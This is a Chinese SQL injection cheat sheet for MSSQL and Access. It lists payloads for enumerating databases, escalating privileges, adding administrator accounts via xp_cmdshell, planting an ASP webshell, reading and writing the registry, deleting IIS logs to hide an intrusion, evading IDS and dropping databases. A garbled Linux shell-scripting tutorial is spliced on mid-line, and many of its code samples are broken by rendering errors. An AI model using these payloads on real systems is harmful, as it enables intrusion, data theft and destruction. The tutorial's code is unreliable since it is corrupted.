SQL手工注入语句

看看下面的
1.判断是否有注入
;and 1=1
;and 1=2

2.初步判断是否是mssql
;and user>0

3.判断数据库系统
;and (select count() from sysobjects)>0 mssql
;and (select count(
) from msysobjects)>0 access

4.注入参数是字符
‘and [查询条件] and ‘’=’

5.搜索时没过滤参数的
‘and [查询条件] and ‘%25’=’

6.猜数据库
;and (select Count(*) from [数据库名])>0

7.猜字段
;and (select Count(字段名) from 数据库名)>0

8.猜字段中记录长度
;and (select top 1 len(字段名) from 数据库名)>0

9.(1)猜字段的ascii值(access)
;and (select top 1 asc(mid(字段名,1,1)) from 数据库名)>0

(2)猜字段的ascii值(mssql)
;and (select top 1 unicode(substring(字段名,1,1)) from 数据库名)>0

10.测试权限结构(mssql)
;and 1=(select IS_SRVROLEMEMBER(‘sysadmin’));–
;and 1=(select IS_SRVROLEMEMBER(‘serveradmin’));–
;and 1=(select IS_SRVROLEMEMBER(‘setupadmin’));–
;and 1=(select IS_SRVROLEMEMBER(‘securityadmin’));–
;and 1=(select IS_SRVROLEMEMBER(‘diskadmin’));–
;and 1=(select IS_SRVROLEMEMBER(‘bulkadmin’));–
;and 1=(select IS_MEMBER(‘db_owner’));–

11.添加mssql和系统的帐户
;exec master.dbo.sp_addlogin username;–
;exec master.dbo.sp_password null,username,password;–
;exec master.dbo.sp_addsrvrolemember sysadmin username;–
;exec master.dbo.xp_cmdshell ‘net user username password /workstations:* /times:all /passwordchg:yes /passwordreq:yes /active:yes /add’;–
;exec master.dbo.xp_cmdshell ‘net user username password /add’;–
;exec master.dbo.xp_cmdshell ‘net localgroup administrators username /add’;–

12.(1)遍历目录
;create table dirs(paths varchar(100), id int)
;insert dirs exec master.dbo.xp_dirtree ‘c:’
;and (select top 1 paths from dirs)>0
;and (select top 1 paths from dirs where paths not in(‘上步得到的paths’))>)

(2)遍历目录
;create table temp(id nvarchar(255),num1 nvarchar(255),num2 nvarchar(255),num3 nvarchar(255));–
;insert temp exec master.dbo.xp_availablemedia;-- 获得当前所有驱动器
;insert into temp(id) exec master.dbo.xp_subdirs ‘c:’;-- 获得子目录列表
;insert into temp(id,num1) exec master.dbo.xp_dirtree ‘c:’;-- 获得所有子目录的目录树结构
;insert into temp(id) exec master.dbo.xp_cmdshell ‘type c:\web\index.asp’;-- 查看文件的内容

13.mssql中的存储过程
xp_regenumvalues 注册表根键, 子键
;exec xp_regenumvalues ‘HKEY_LOCAL_MACHINE’,‘SOFTWARE\Microsoft\Windows\CurrentVersion\Run’ 以多个记录集方式返回所有键值
xp_regread 根键,子键,键值名
;exec xp_regread ‘HKEY_LOCAL_MACHINE’,‘SOFTWARE\Microsoft\Windows\CurrentVersion’,‘CommonFilesDir’ 返回制定键的值
xp_regwrite 根键,子键, 值名, 值类型, 值
值类型有2种REG_SZ 表示字符型,REG_DWORD 表示整型
;exec xp_regwrite ‘HKEY_LOCAL_MACHINE’,‘SOFTWARE\Microsoft\Windows\CurrentVersion’,‘TestvalueName’,‘reg_sz’,‘hello’ 写入注册表
xp_regdeletevalue 根键,子键,值名
exec xp_regdeletevalue ‘HKEY_LOCAL_MACHINE’,‘SOFTWARE\Microsoft\Windows\CurrentVersion’,‘TestvalueName’ 删除某个值
xp_regdeletekey ‘HKEY_LOCAL_MACHINE’,‘SOFTWARE\Microsoft\Windows\CurrentVersion\Testkey’ 删除键,包括该键下所有值

14.mssql的backup创建webshell
use model
create table cmd(str image);
insert into cmd(str) values (’’);
backup database model to disk=‘c:\l.asp’;

15.mssql内置函数
;and (select @@version)>0 获得Windows的版本号
;and user_name()=‘dbo’ 判断当前系统的连接用户是不是sa
;and (select user_name())>0 爆当前系统的连接用户
;and (select db_name())>0 得到当前连接的数据库

16.简洁的webshell
use model
create table cmd(str image);
insert into cmd(str) values (’’);
backup database model to disk=‘g:\wwwtest\l.asp’;

请求的时候,像这样子用:
http://ip/l.asp?c=dir
SQL手工注入大全

前提需要工具:SQL Query Analyzer和SqlExec Sunx Version

1.去掉xp_cmdshell扩展过程的方法是使用如下语句:

if exists (select * from dbo.sysobjects where id=object_id(N’[dbo].[xpcmdshell]’) and OBJECTPROPERTY(id,N’IsExtendedProc’)=1)
exec sp_dropextendedproc N’[dbo].[xp_cmdshell]’

2.添加xp_cmdshell扩展过程的方法是使用如下语句:

(1)SQL Query Analyzer

sp_addextendedproc xp_cmdshell,@dllname=‘xplog70.dll’

(2)首先在SqlExec Sunx Version的Format选项里填上%s,在CMD选项里输入

sp_addextendedproc ‘xp_cmdshell’,‘xpsql70.dll’

去除

sp_dropextendedproc ‘xp_cmdshell’

(3)MSSQL2000

sp_addextendedproc ‘xp_cmdshell’,‘xplog70.dll’

?

SQL手工注入方法总结(SQL Server2005)2010-01-28 16:17---------以下以省略注入点用URL代替

–(1) 查看驱动器方法

– 建表p(i为自动编号,a记录盘符类似"c:",b记录可用字节,其它省略)
URL;create table p(i int identity(1,1),a nvarchar(255),b nvarchar(255),c nvarchar(255),d nvarchar(255));–

URL;insert p exec xp_availablemedia;–列出所有驱动器并插入表p

URL;and (select count(*) from p)>3;–折半法查出驱动器总数

URL;and ascii(substring((select a from p where i=1),1,1))=67;–折半法查出驱动器名(注asc©=67)

–上面一般用于无显错情况下使用-------以此类推,得到所有驱动器名

URL;and (select a from p where i=1)>3;–报错得到第一个驱动器名

–上面一般用于显错情况下使用-------以此类推,得到所有驱动器名

URL;;drop table p;–删除表p

–(2) 查看目录方法

URL;create table pa(m nvarchar(255),i nvarchar(255));–建表pa(m记录目录,i记录深度)

URL;insert pa exec xp_dirtree ’e:’;–列出驱动器e并插入表pa

URL;and (select count(*) from pa where i>0)>-1;–折半法查出i深度

URL;and (select top 1 m from pa where i=1 and m not in(select top 0 m from pa))>0;–报错得到深度i=1的第一个目录名

–上面一般用显错且目录名不为数字情况下使用-------(得到第二个目录把"top 0"换为"top 1",换深度只换i就行)以此类推,得到e盘的所有目录

URL;and len((select top 1 m from pa where i=1 and m not in(select top 0 m from pa)))>0;–折半法查出深度i=1的第一个目录名的长度

URL;and ascii(substring((select top 1 m from pa where i=1 and m not in(select top 0 m from pa)),1,1))>0;–折半法查出深度i=1的第一个目录名的第一个字符长度

–上面一般用无显错情况下使用-------(得到第二个目录把"top 0"换为"top 1",换深度只换i就行)以此类推,得到e盘的所有目录

URL;drop
手工MSSQL注入常用SQL语句
and exists (select * from sysobjects) //判断是否是MSSQL
and exists(select * from tableName) //判断某表是否存在…tableName为表名
and 1=(select @@VERSION) //MSSQL版本
And 1=(select db_name()) //当前数据库名
and 1=(select @@servername) //本地服务名
and 1=(select IS_SRVROLEMEMBER(‘sysadmin’)) //判断是否是系统管理员
and 1=(Select IS_MEMBER(‘db_owner’)) //判断是否是库权限
and 1= (Select HAS_DBACCESS(‘master’)) //判断是否有库读取权限
and 1=(select name from master.dbo.sysdatabases where dbid=1) //暴库名DBID为1,2,3….
;declare @d int //是否支持多行
and 1=(Select count() FROM master.dbo.sysobjects Where xtype = ‘X’ AND name = ‘xp_cmdshell’) //判断XP_CMDSHELL是否存在
and 1=(select count(
) FROM master.dbo.sysobjects where name= ‘xp_regread’) //查看XP_regread扩展存储过程是不是已经被删除
添加和删除一个SA权限的用户test:(需要SA权限)
exec master.dbo.sp_addlogin test,password
exec master.dbo.sp_addsrvrolemember test,sysadmin
停掉或激活某个服务。 (需要SA权限)
exec master…xp_servicecontrol ‘stop’,’schedule’
exec master…xp_servicecontrol ‘start’,’schedule’
暴网站目录
create table labeng(lala nvarchar(255), id int)
DECLARE @result varchar(255) EXEC master.dbo.xp_regread ‘HKEY_LOCAL_MACHINE’,’SYSTEM\ControlSet001\Services\W3SVC\Parameters\Virtual Roots’,’/’,@result output insert into labeng(lala) values(@result);
and 1=(select top 1 lala from labeng) 或者and 1=(select count() from labeng where lala>1)
—————————————————————————————————————————————————————分割
SQL Server
判断是否可注射:
http://www.exehack.net/article.asp?id=6
http://www.exehack.net/article.asp?id=6′
http://www.exehack.net/article.asp?id=6 and 1=1
http://www.exehack.net/article.asp?id=6 and 1=2
http://www.exehack.net/article.asp?action=value’ and 1=1
http://www.exehack.net/article.asp?action=value’ and 1=2
searchpoints%’ and 1=1
searchpoints%’ and 1=2
确定数据库类型:
http://www.exehack.net/article.asp?id=6 and user>0
http://www.exehack.net/article.asp?id=6 and (select count(
) from sysobjects)>0
查询当前用户数据信息:
article.asp?id=6 having 1=1–
暴当前表中的列:
article.asp?id=6 group by admin.username having 1=1–
article.asp?id=6 group by admin.username,admin.password having 1=1–
暴任意表和列:
and (select top 1 name from (select top N id,name from sysobjects where xtype=char(85)) T order by id desc)>1
and (select top col_name(object_id(‘admin’),N) from sysobjects)>1
暴数据库数据:
and (select top 1 password from admin where id=N)>1
修改数据库中的数据:
;update admin set password=’oooooo’ where username=’xxx’
增添数据库中的数据:
;insert into admin values (xxx,oooooo)–
删数据库:
;drop database webdata
获取当前数据库用户名:and user>0
获取当前数据库名:and db_name()>0
获取数据库版本:and (select @@version)>0
判断是否支持多句查询:;declare @a int–
判断是否支持子查询:and (select count(1) from [sysobjects])>=0
数据库的扩展存储过程:exec master…xp_cmdshell
查看服务器C盘目录:;exec_master…xp_cmdshell ‘dir c:\’
判断扩展存储过程是否存在:and select count() from master.dbo.sysobjects where xtype=’x’ and name=’xp_cmdshell’
恢复扩展存储过程:;exec sp_addextendedproc xp_cmdshell,’xplog70.dll’
删除扩展存储过程:;exec sp_dropextendedproc ‘xp_cmdshell’
在MSSQL2000中提供了一些函数用于访问OLE对象间接获取权限:
;declare @s int
;exec sp_oacreat ‘wscript.shell’,@s
;exec master…spoamethod @s,’run’,null,’cmd.exe/c dir c:\’
判断当前数据库用户名是否拥有比较高的权限:
and 1=(select is_srvrolemember(‘sysadmin’))
and 1=(select is_srvrolemember(‘serveradmin’))
and 1=(select is_srvrolemember(‘setupadmin’))
and 1=(select is_srvrolemember(‘securityadmin’))
and 1=(select is_srvrolemember(‘diskadmin’))
and 1=(select is_srvrolemember(‘bulkadmin’))
判断当前数据库用户名是否为DB_OWNER:
and 1=(select is_member(‘db_owner’))
在SQLSERVER的master.dbo.sysdatabases表中存放着SQLSERVER数据库系统中的所有数据库信息,只需要PUBLIC权限就可以对此表进行SELECT操作:
and (select top 1 name from master.dbo.sysdatabase order by dbid)>0
and (select top 1 name from master.dbo.sysdatabase where name not in(select top 1 name from master.dbo.sysdatabases order by dbid) order by dbid)>0
删除日志记录:
;exec master.dbo.xp_cmdshell ‘del c:\winnt\system32\logfiles\w3svc5\ex070606.log >c:\temp.txt’
替换日志记录:
;exec master.dbo.xp_cmdshell ‘copy c:\winnt\system32\logfiles\w3svc5\ex070404.log c:\winnt\system32\logfiles\w3svc5\ex070606.log >c:\temp.txt’
获取WEB路径:
;declare @shell int
;exec master…sp_oamethod ‘wscript.shell’,@shell out
;exec master…sp_oamethod @shell,’run’,null,’cmd.exe/c dir /s d:/index.asp >c:/log.txt
利用XP_CMDSHELL搜索:
;exec master…xp_cmdshell ‘dir /s d:/index.asp’
显示服务器网站配置信息命令:
cmd /c cscript.exe c:\inetpub\adminscript\adsutil.vbs enum w3svc/1/root
cmd /c cscript.exe c:\inetpub\adminscript\adsutil.vbs enum w3svc/2/root
利用XP_REGREAD可用PUBLIC权限读取:
;exec master.dbo.xp_regread
hkey_local_machine,
‘system\currentcontrolset\services\w3svc\parameters\virtual roots\’
‘/’
SQLSERVER下的高级技术可以参考阅读曾云好所著的精通脚本黑客第五章。
3、DSqlHelper
检测权限SYSADMIN:
and 1=(select IS_SRVROLEMEMBER(‘sysadmin’))
serveradmin、setupadmin、securityadmin、diskadmin、bulkadmin、db_owner。
检测XP_CMDSHELL(CMD命令):
and 1=(SELECT count(
) FROM master.dbo.sysobjects WHERE name= ‘xp_cmdshell’)
检测XP_REGREAD(注册表读取功能):
and 1=(SELECT count() FROM master.dbo.sysobjects WHERE name= ‘xp_regread’)
检测SP_MAKEWEBTASK(备份功能):
and 1=(SELECT count(
) FROM master.dbo.sysobjects WHERE name= ‘sp_makewebtask’)
检测SP_ADDEXTENDEDPROC:
and 1=(SELECT count() FROM master.dbo.sysobjects WHERE name= ‘sp_addextendedproc’)
检测XP_SUBDIRS读子目录:
and 1=(SELECT count(
) FROM master.dbo.sysobjects WHERE name= ‘xp_subdirs’)
检测XP_DIRTREE读子目录:
and 1=(SELECT count() FROM master.dbo.sysobjects WHERE name= ‘xp_dirtree’)
修改内容:
; UPDATE 表名 set 字段=内容 where 1=1
XP_CMDSHELL检测:
;exec master…xp_cmdshell ‘dir c:\’
修复XP_CMDSHELL:
;exec master.dbo.sp_addextendedproc ‘xp_cmdshell’, ‘xplog70.dll’
用XP_CMDSHELL添加用户hacker:
;exec master.dbo.xp_cmdshell ‘net user hacker 123456 /add’
XP_CMDSHELL把用户hacker加到ADMIN组:
;exec master.dbo.xp_cmdshell ‘net localgroup administrators hacker /add’
创建表test:
;create table [dbo].[test] ([dstr]char);
检测表段test:
and exists (select * from test)
读取WEB的位置(读注册表):
;DECLARE @result varchar(255) EXEC master.dbo.xp_regread ‘HKEY_LOCAL_MACHINE’,’SYSTEM\ControlSet001\Services\W3SVC\Parameters\Virtual Roots’, ‘/’,@result output insert into test (dstr) values(@result);–
爆出WEB的绝对路径(显错模式):
and 1=(select count(
) from test where dstr > 1)
删除表test:
;drop table test;–
创建查看目录的表dirs:
;create table dirs(paths varchar(100), id int)
把查看目录的内容加入表dirs:
;insert dirs exec master.dbo.xp_dirtree ‘c:\’
爆目录的内容dirs:
and 0<>(select top 1 paths from dirs)
备份数据库DATANAME:
declare @a sysname; set @a=db_name();backup DATANAME @a to disk=’c:\inetpub\wwwroot\down.bak’;–
删除表dirs:
;drop table dirs;–
创建表temp:
;create table temp(id nvarchar(255),num1 nvarchar(255),num2 nvarchar(255),num3 nvarchar(255));–
把驱动盘列表加入temp表:
;insert temp exec master.dbo.xp_availablemedia;–
删除表temp:
;delete from temp;–
创建表dirs:
;create table dirs(paths varchar(100), id int);–
获得子目录列表XP_SUBDIRS:
;insert dirs exec master.dbo.xp_subdirs ‘c:\’;–
爆出内容(显错模式):
and 0<>(select top 1 paths from dirs)
删除表dirs:
;delete from dirs;–
创建表dirs:
;create table dirs(paths varchar(100), id int)–
用XP_CMDSHELL查看目录内容:
;insert dirs exec master…xp_cmdshell ‘dir c:\’
删除表dirs:
;delete from dirs;–
检测SP_OAcreate(执行命令):
and 1=(SELECT count(*) FROM master.dbo.sysobjects WHERE name= ‘SP_OAcreate’)
SP_OAcreate执行CMD命令:
;DECLARE @shell INT EXEC SP_OAcreate ‘wscript.shell’,@shell OUTPUT EXEC SP_OAMETHOD @shell,’run’,null, ‘C:\WINNT\system32\cmd.exe /c net user hacker 123456 /add’
SP_OAcreate建目录:
;DECLARE @shell INT EXEC SP_OAcreate ‘wscript.shell’,@shell OUTPUT EXEC SP_OAMETHOD @shell,’run’,null, ‘C:\WINNT\system32\cmd.exe /c md c:\inetpub\wwwroot\1111’
创建一个虚拟目录E盘:
;declare @o int exec sp_oacreate ‘wscript.shell’, @o out exec sp_oamethod @o, ‘run’, NULL,’ cscript.exe c:\inetpub\wwwroot\mkwebdir.vbs -w “默认 Web 站点” -v “e”,”e:\”‘
设置虚拟目录E为可读:
;declare @o int exec sp_oacreate ‘wscript.shell’, @o out exec sp_oamethod @o, ‘run’, NULL,’ cscript.exe c:\inetpub\wwwroot\chaccess.vbs -a w3svc/1/ROOT/e +browse’
启动SERVER服务:
;exec master…xp_servicecontrol ‘start’, ‘server’
绕过IDS检测XP_CMDSHELL:
;declare @a sysname set @a=’xp_’+’cmdshell’ exec @a ‘dir c:\’
开启远程数据库1:
; select * from OPENROWSET(‘SQLOLEDB’, ‘server=servername;uid=sa;pwd=apachy_123’, ‘select * from table1’ )
开启远程数据库2:
;select * from OPENROWSET(‘SQLOLEDB’, ‘uid=sa;pwd=apachy_123;Network=DBMSSOCN;Address=202.100.100.1,1433;’, ‘select * from table’ l Shell命令行的运行
● l编写、修改权限和执行Shell程序的步骤
● 在Shell程序中使用参数和变量
● 表达式比较、循环结构语句和条件结构语句
● 在Shell程序中使用函数和调用其他Shell程序

Shell命令行书写规则
u Shell命令行的书写规则
对Shell命令行基本功能的理解有助于编写更好的Shell程序,在执行Shell命令时多个命令可以在一个命令行上运行,但此时要使用分号(;)分隔命令,例如:
[root@localhost root]# ls a* -l;free;df
长Shell命令行可以使用反斜线字符(\)在命令行上扩充,例如:
[root@localhost root]# echo “this is \

long command”
This is long command
注意:
“>”符号是自动产生的,而不是输入的。

编写/修改权限及执行Shell程序的步骤
u 编写Shell程序
u 执行Shell程序
Shell程序有很多类似C语言和其他程序设计语言的特征,但是又没有程序语言那样复杂。Shell程序是指放在一个文件中的一系列Linux命令和实用程序。在执行的时候,通过Linux操作系统一个接一个地解释和执行每条命令。首先,来编写第一个Shell程序,从中学习Shell程序的编写、修改权限、执行过程。

编辑Shell程序
编辑一个内容如下的源程序,保存文件名为date,可将其存放在目录/bin下。
[root@localhost bin]#vi date
#! /bin/sh
echo “Mr.$USER,Today is:”
echo &date “+%B%d%A”
echo “Wish you a lucky day !”
注意:
#! /bin/sh通知采用Bash解释。如果在echo语句中执行Shell命令date,则需要在date命令前加符号“&”,其中%B%d%A为输入格式控制符。

建立可执行程序
编辑完该文件之后不能立即执行该文件,需给文件设置可执行程序权限。使用如下命令。
[root@localhost bin]#chmod +x date

执行Shell程序
执行Shell程序有下面三种方法:
方法一:
[root@localhost bin]#./ date
Mr.root,Today is:
二月 06 星期二
Wish you a lucky day !
方法二:
另一种执行date的方法就是把它作为一个参数传递给Shell命令:
[root@localhost bin]# Bash date
Mr.root,Today is:
二月 06 星期二
Wish you a lucky day !
方法三:
为了在任何目录都可以编译和执行Shell所编写的程序,即把/bin的这个目录添加到整个环境变量中。
具体操作如下:
[root@localhost root]#export PATH=/bin:$PATH
[root@localhost bin]# date
Mr.root,Today is:
二月 06 星期二
Wish you a lucky day !
实例 12-1:编写一个Shell程序mkf,此程序的功能是:显示root下的文件信息,然后建立一个kk的文件夹,在此文件夹下建立一个文件aa,修改此文件的权限为可执行。
分析:此Shell程序中需要依次执行下列命令为:
进入root目录:cd /root
显示root目录下的文件信息:ls –l
新建文件夹kk: mkdir kk
进入root/kk目录:cd kk
新建一个文件aa: vi aa #编辑完成后需手工保存
修改aa文件的权限为可执行:chmod +x aa
回到root目录:cd /root
因此该Shell程序只是以上命令的顺序集合,假定程序名为mkf
[root@localhost root]#vi mkf
cd /root
ls –l
mkdir kk
cd kk
vi aa
chmod +x aa
cd /root
在Shell程序中使用的参数
u 位置参数
u 内部参数
如同ls命令可以接受目录等作为它的参数一样,在Shell编程时同样可以使用参数。Shell程序中的参数分为位置参数和内部参数等。

位置参数
由系统提供的参数称为位置参数。位置参数的值可以用$N得到,N是一个数字,如果为1,即$1。类似C语言中的数组,Linux会把输入的命令字符串分段并给每段进行标号,标号从0开始。第0号为程序名字,从1开始就表示传递给程序的参数。如$0表示程序的名字,$1表示传递给程序的第一个参数,以此类推。

内部参数
上述过程中的$0是一个内部变量,它是必须的,而$1则可有可无,最常用的内部变量有 0 、 0、 0#、 ? 、 ?、 ?,它们的含义如下。
l $0:命令含命令所在的路径。
l $#:传递给程序的总的参数数目。
l $?:Shell程序在Shell中退出的情况,正常退出返回0,反之为非0值。
l $
:传递给程序的所有参数组成的字符串。
实例 12-2:编写一个Shell程序,用于描述Shell程序中的位置参数为: 0 、 0、 0#、 ? 、 ?、 ?,程序名为test1,代码如下:
[root@localhost bin]#vi test1
#! /bin/sh
echo “Program name is $0”;
echo “There are totally $# parameters passed to this program”;
echo “The last is $?”;
echo “The parameter are $
”;
执行后的结果如下:
[root@localhost bin]# test1 this is a test program //传递5个参数
Program name is /bin/test1 //给出程序的完整路径和名字
There are totally 5 parameters passed to this program //参数的总数
The last is 0 //程序执行效果
The parameters are this is a test program //返回由参数组成的字符串

注意:命令不计算在参数内。

实例 12-3:利用内部变量和位置参数编写一个名为test2的简单删除程序,如删除的文件名为a,则在终端中输入的命令为:test a
分析:除命令外至少还有一个位置参数,即$#不能为0,删除不能为$1,程序设计过程如下。
(1) 用vi编辑程序
[root@localhost bin]#vi test2
#! /bin/sh
if test $# -eq 0
then
echo “Please specify a file!”
else
gzip $1 //现对文件进行压缩
mv $1.gz $HOME/dustbin //移动到回收站
echo “File $1 is deleted !”
fi
(2) 设置权限
[root@localhost bin]#chmod +x test2
(3) 运行
[root@localhost bin]# test2 a (如果a文件在bin目录下存在)
File a is deleted!
在Shell程序中的使用变量
u 变量的赋值
u 变量的访问
u 变量的输入

变量的赋值
在Shell编程中,所有的变量名都由字符串组成,并且不需要对变量进行声明。要赋值给一个变量,其格式如下:
变量名=值
注意:
等号(=)前后没有空格
例如:
x=6
a=”How are you ”
表示把6赋值给变量x,字符串“How are you ”赋值给变量a。

访问变量值
如果要访问变量值,可以在变量前面加一个美元符号“KaTeX parse error: Expected 'EOF', got '#' at position 29: …localhost bin]#̲a=”How are you …a”
A is:hello world
一个变量给另一个变量赋值可以写成:
变量2= 变 量 1 例 如 : x = 变量1 例如: x= 1x=i
i++可以写成:
i=$i+1

键盘读入变量值
在Shell程序设计中,变量的值可以作为字符串从键盘读入,其格式为:
read 变量
例如:
[root@localhost bin]#read str
read为读入命令,它表示从键盘读入字符串到str。
实例 12-4:编写一个Shell程序test3,程序执行时从键盘读入一个目录名,然后显示这个目录下所有文件的信息。
分析:
存放目录的变量为DIRECTORY,其读入语句为:
read DIRECTORY
显示文件的信息命令为:ls –a
[root@localhost bin]#vi test3
#! /bin/sh
echo “please input name of directory”
read DIRECTORY
cd $DIRECTORY
ls –l
(2)设置权限
[root@localhost bin]#chmod +x test3
(3)执行
[root@localhost bin]#./test3
注意:
输入路径时需“/”
实例 12-5:运行程序test4,从键盘读入x、y的值,然后做加法运算,最后输出结果。
(1)用vi编辑程序
[root@localhost bin]#vi test4
#! /bin/sh
echo “please input x y”
read x,y
z=expr $x+$y
echo “The sum is $z”
(2)设置权限
[root@localhost bin]#chmod +x test4
(3)执行
[root@localhost bin]#./ test4
45 78
The sum is 123
注意:
表达式total=expr $total +$num及num=expr $num +1中的符号“”为键盘左上角的“”键。

表达式的比较
u 字符串操作符
u 逻辑运算符
u 用test比较的运算符
u 数字比较符
u 文件操作符

在Shell程序中,通常使用表达式比较来完成逻辑任务。表达式所代表的操作符有字符操作符、数字操作符、逻辑操作符、以及文件操作符。其中文件操作符是一种Shell所独特的操作符。因为Shell里的变量都是字符串,为了达到对文件进行操作的目的,于是才提供了文件操作符。

字符串比较
作用:测试字符串是否相等、长度是否为零,字符串是否为NULL。
常用的字符串操作符如表12-1所示.。
表12-1 常用的字符串操作符
字符串操作符   含义及返回值
=  比较两个字符串是否相同,相同则为“真”
 !=  比较两个字符串是否不相同,不同则为“真”
  -n 比较两个字符串长度是否大于零,若大于零则为“真”
  -z 比较两个字符串长度是否等于零,若等于零则为“真”
实例 12-6:从键盘输入两个字符串,判断这两个字符串是否相等,如相等输出。
(1)用vi编辑程序
[root@localhost bin]#vi test5
#! /bin/Bash
read ar1
read ar2
[ “ a r 1 ” = “ ar1” = “ ar1=ar2” ]
echo KaTeX parse error: Expected 'EOF', got '#' at position 3: ? #̲?保存前一个命令的返回码 (2…ar” ]
echo $? //保存前一个命令的返回码
(2)设置权限
[root@localhost bin]#chmod +x test6
(3)执行
[root@localhost bin]#./ test6
0
注意:
运行结果1表示ar的小于等于零,0表示ar的长度大于零。

数字比较
在Bash Shell编程中的关系运算有别于其他编程语言,用表12-2中的运算符用test语句表示大小的比较。
表12-2 用test比较的运算符
  运算符号   含义
-eq   相等
-ge   大于等于
-le   小于等于
-ne   不等于
-gt   大于
-lt   小于
实例 12-8:比较两个数字是否相等
(1)用vi编辑程序
[root@localhost bin]#vi test7
#! /bin/Bash
read x,y
if test $x –eq y t h e n e c h o “ y then echo “ ythenechox= y ” e l s e e c h o “ y” else echo “ yelseechox!=$y”
fi
(2)设置权限
[root@localhost bin]#chmod +x test7
(3)执行
[root@localhost bin]#./ test7
50 100
50!=100
[root@localhost bin]#./ test7
150 150
150= =150

逻辑操作
在Shell程序设计中的逻辑运算符如表12-3所示。
12-3 Shell中的逻辑运算符
 运算符号   含义
  !  反:与一个逻辑值相反的逻辑值
  -a  与(and):两个逻辑值为“是”返回值为“是”,反之为“否”
  -o 或(or): 两个逻辑值有一个为“是”,返回值就是“是”
实例 12-9:分别给两个字符变量赋值,一个变量赋予一定的值,另一个变量为空,求两者的与、或操作。
(1)用vi编辑程序
[root@localhost bin]#vi test8
#! /bin/Bash
part1 =”1111”
part2 =” ” #part2为空
[ “$ part1” –a “$ part2”]
echo KaTeX parse error: Expected 'EOF', got '#' at position 9: ? #̲保存前一个命令的返回码 [… part1” –o “$ part2”]
echo $?
(2)设置权限
[root@localhost bin]#chmod +x test8
(3)执行
[root@localhost bin]#./ test8
1
0
文件操作
文件测试操作表达式通常是为了测试文件的信息,一般由脚本来决定文件是否应该备份、复制或删除。由于test关于文件的操作符有很多,在表12-4中只列举一些常用的操作符。

}】表12-4   文件测试操作符

运算符号   含义
 -d  对象存在且为目录返回值为“是”
 -f  对象存在且为文件返回值为“是”
-L  对象存在且为符号连接返回值为“是”
 -r  对象存在且可读则返回值为“是”
 -s  对象存在且长度非零则返回值为“是”
 -w  对象存在且且可写则返回值为“是”
 -x  对象存在且且可执行则返回值为“是”
实例 12-10:判断zb目录是否存在于/root下。
(1)用vi编辑程序
[root@localhost bin]#vi test9
#! /bin/Bash
[ -d /root/zb ]
echo KaTeX parse error: Expected 'EOF', got '#' at position 6: ? #̲保存前一个命令的返回码 …?”,结果1表示判断的目录不存在,0表示判断的目录不存在。
实例 12-11:编写一个Shell程序test10,输入一个字符串,如果是目录,则显示目录下的信息,如为文件显示文件的内容。
(1)用vi编辑程序
[root@localhost bin]#vi test10
#! /bin/Bash
echo “Please enter the directory name or file name”
read DORF
if [ -d $DORF ]
then
ls $DORF
elif [ -f $DORF ]
then
cat $DORF
else
echo “input error! ”
fi
(2)设置权限
[root@localhost bin]#chmod +x test10
(3)执行
[root@localhost bin]#./ test10

循环结构语句
u Shell的循环语句
Shell常见的循环语句有for循环、while循环语句和until循环。

for循环
语法:
for 变量 in 列表
do
操作
done
注意:
变量要在循环内部用来指列表当中的对象。
列表是在for循环的内部要操作的对象,可以是字符串也可以是文件,如果是文件则为文件名。
实例 12-12:在列表中的值:a,b,c,e,I,2,4,6,8用循环的方式把字符与数字分成两行输出。
(1)用gedit编辑脚本程序test11
[root@localhost bin]#gedit test11
#! /bin/Bash
for i in a,b,c,e,I 2,4,6,8
do
echo KaTeX parse error: Expected 'EOF', got '#' at position 37: …localhost bin]#̲chmod +x test11…HOME/.Trash中,因而是在删除$HOME/.Trash列表当中的所有文件,程序脚本如下。
(1)用gedit编辑脚本程序test12
[root@localhost bin]#gedit test12
#! /bin/Bash
for i in $HOME/.Trash/*
do
rm $ i
echo “$ i has been deleted!”
done
(2)设置权限
[root@localhost bin]#chmod +x test12
(3)执行
[root@localhost bin]#./ test12
/root/.Trash/abc~ has been deleted!
/root/.Trash/abc1 has been deleted!
实例 12-14:求从1~100的和。
(1)用gedit编辑脚本程序test13
[root@localhost bin]#gedit test13
#! /bin/Bash
total =0
for((j=1;j<=100;j++));
do
total=expr $total + $j
done
echo “The result is $total”
(2)设置权限
[root@localhost bin]#chmod +x test13
(3)执行
[root@localhost bin]#./ test13
The result is 5050
注意:
for语句中的双括号不能省,最后的分号可有可无,表达式total=expr $total + $j的加号两边的空格不能省,否则会成为字符串的连接。

while 循环
语法:
while 表达式
do
操作
done
只要表达式为真,do和done之间的操作就一直会进行。
实例 12-15:用while循环求1~100的和。
(1)用gedit编辑脚本程序test14
[root@localhost bin]#gedit test13
total =0
num=0
while((num<=100));
do
total=’expor t o t a l + total + total+ num’
done
echo “The result is $total”
(2)设置权限
[root@localhost bin]#chmod +x test14
(3)执行
[root@localhost bin]#./ test14
The result is 5050

until循环
语法:
until 表达式
do
操作
done
重复do和done之间的操作直到表达式成立为止。
实例 12-16:用until循环求1~100的和。
(1)用gedit编辑脚本程序test15
[root@localhost bin]#gedit test15
total =0
num=0
until [$sum –gt 100]
do
total=’expor t o t a l + total + total+ num’
num=’expr $num + 1’
done
echo “The result is $total”
(2)设置权限
[root@localhost bin]#chmod +x test15
(3)执行
[root@localhost bin]#./ test15
The result is 5050

条件结构语句
u Shell的条件结构语句
Shell程序中的条件语句主要有if语句与case语句。

if语句
语法:
if 表达式1 then
操作
elif表达式2 then
操作
elif表达式3 then
操作
……
else
操作
fi

Linux里的if的结束标志是将if反过来写成fi;而elif其实是else if的缩写。其中,elif理论上可以有无限多个。

实例 12-17:用for循环求1~100的和。
(1)用gedit编辑脚本程序test16
[root@localhost bin]#gedit test16
for((j=0;j<=10;j++))
do
if(( j t h e n e c h o “ j%2==1)) then echo “ jthenechoj”
fi
done
(2)设置权限
[root@localhost bin]#chmod +x test16
(3)执行
[root@localhost bin]#./ test16
13579

case语句
语法:
case 表达式 in
值1|值2)
操作;;
值3|值4)
操作;;
值5|值6)
操作;;
*)
操作;;
esac
case的作用就是当字符串与某个值相同是就执行那个值后面的操作。如果同一个操作对于多个值,则使用“|”将各个值分开。在case的每一个操作的最后面都有两个“;;”分号是必需的。
实例 12-18:Linux是一个多用户操作系统,编写一程序根据不同的用户登录输出不同的反馈结果。
(1)用vi编辑脚本程序test17
[root@localhost bin]#gedit test17
#!/bin/sh
